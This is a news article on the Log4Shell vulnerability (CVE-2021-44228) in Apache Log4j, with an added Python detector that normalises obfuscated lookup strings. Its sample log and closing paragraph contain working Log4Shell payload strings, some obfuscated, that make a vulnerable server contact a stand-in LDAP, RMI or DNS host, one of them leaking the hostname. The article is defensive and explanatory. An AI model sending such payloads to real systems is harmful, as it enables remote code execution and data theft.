White Hat Institute

A serious Log4J flaw puts much of the internet at risk

Retrieved from xda-developers.com

The Apache Software Foundation has issued patches to address an actively exploited zero-day flaw in the Apache Log4j Java-based logging library that can be used to execute malicious code and take full control of vulnerable systems.

The bug, tracked as CVE-2021-44228 and known as Log4Shell or LogJam, is an unauthenticated remote code execution (RCE) vulnerability affecting any application that uses the open-source library; it is present in Log4j versions 2.0-beta9 through 2.14.1. The vulnerability received the maximum CVSS score of 10.0, reflecting the severity of the issue.

When message lookup substitution is enabled, an attacker who controls log messages or log message parameters can execute arbitrary code loaded from LDAP servers (via the JNDI lookup). This behaviour has been disabled by default in Log4j 2.15.0.

A single line of text, if it is logged through a vulnerable instance of Log4j, can make the application contact a malicious external host, essentially giving the attacker the ability to fetch a payload from a remote server and run it locally. The flaw was discovered by Chen Zhaojun of the Alibaba Cloud Security Team, according to the project maintainers.
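As an added example (not code from the article or from the Log4j project), the following Python detector shows what such a line of text looks like and how to spot it in attacker-controllable input before or after it is logged. Log4j resolves ${...} lookups inside-out, and in-the-wild payloads use that to hide the word "jndi" behind lookups such as ${lower:j}, ${::-j} or ${env:UNSET:-j}; the detector resolves the same handful of lookups and reports any resulting JNDI target. The sample request lines are constructed for this example, and 198.51.100.0/24 is a documentation address range.

```python
"""Added example: normalise Log4j lookup syntax to expose CVE-2021-44228
(Log4Shell) JNDI payloads hidden behind the obfuscation tricks seen in
the wild.  Stand-alone detector, not Log4j's own code."""
import re
from typing import List, Tuple

# Innermost ${...}: a body with no further '$', '{' or '}' inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Sentinels that stand in for '${' and '}' once a lookup has been handled,
# so the regex does not match it again but the text stays recoverable.
_OPEN, _CLOSE = "\x00", "\x01"


def _restore(s: str) -> str:
    return s.replace(_OPEN, "${").replace(_CLOSE, "}")


def _resolve_one(body: str, hits: List[str]) -> str:
    """Resolve one innermost lookup the way Log4j's StrSubstitutor would,
    for the lookups attackers use to assemble 'jndi' at runtime."""
    low = body.lower()
    if low.startswith("lower:"):        # ${lower:J}  -> j
        return body[6:].lower()
    if low.startswith("upper:"):        # ${upper:j}  -> J
        return body[6:].upper()
    if low.startswith("jndi:"):         # the dangerous lookup itself
        hits.append(body[5:])
        return _OPEN + body + _CLOSE    # keep it visible, stop re-matching
    key, sep, default = body.partition(":-")
    if sep:                             # ${::-j}, ${env:NOPE:-j} -> j
        return default
    return _OPEN + body + _CLOSE        # unknown lookup: leave as-is


def scan(text: str) -> Tuple[str, List[str]]:
    """Return (normalised text, JNDI targets found).  Lookups are resolved
    inside-out until nothing changes, mirroring Log4j's evaluation order."""
    hits: List[str] = []
    prev = None
    while prev != text:
        prev = text
        text = _INNERMOST.sub(lambda m: _resolve_one(m.group(1), hits), text)
    return _restore(text), [_restore(h) for h in hits]


def is_log4shell(text: str) -> bool:
    return bool(scan(text)[1])


# Constructed sample request log (not real traffic).  Each line is the kind
# of string a web application might hand to a vulnerable Log4j.
SAMPLE_REQUEST_LOG = [
    'GET /index.html "Mozilla/5.0 (X11; Linux x86_64)"',
    'GET /login "${jndi:ldap://198.51.100.7:1389/a}"',
    'GET /api "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    'GET /api "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/x}"',
    'GET /api "${${env:NOPE:-j}ndi:dns://${hostName}.198.51.100.7/probe}"',
    'GET /search?q=${date:yyyy} "curl/7.79"',
]


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, JNDI targets) for every line that would
    trigger a JNDI lookup if logged by a vulnerable Log4j."""
    out = []
    for n, line in enumerate(lines, 1):
        _, hits = scan(line)
        if hits:
            out.append((n, hits))
    return out


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_REQUEST_LOG):
        print(f"line {n}: {hits}")
```

Line 5 of the sample shows why the normaliser keeps unresolved lookups in place: payloads that embed ${env:...} or ${hostName} inside the JNDI URL are exfiltration attempts, and the reported target preserves them. Pattern matching like this is useful for triage and for hunting in existing logs, but it is not a fix; the lookup engine has many more tricks than are handled here, so vulnerable hosts still need the patched release.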

Because of the simplicity of the attack and the widespread use of Log4j in enterprise IT and DevOps, in-the-wild attacks on vulnerable servers are expected to increase over the coming days, making prompt patching essential. Cybereason, an Israeli security company, has also released a mitigation named “Logout4Shell” that closes the hole by using the vulnerability itself to reconfigure the logger, preventing further exploitation.

The weakness in Log4j (CVE-2021-44228) is extremely serious. Log4j is used by millions of applications for logging, and all an attacker has to do is get the application to log a specially crafted string of the form ${jndi:ldap://attacker-host/path}.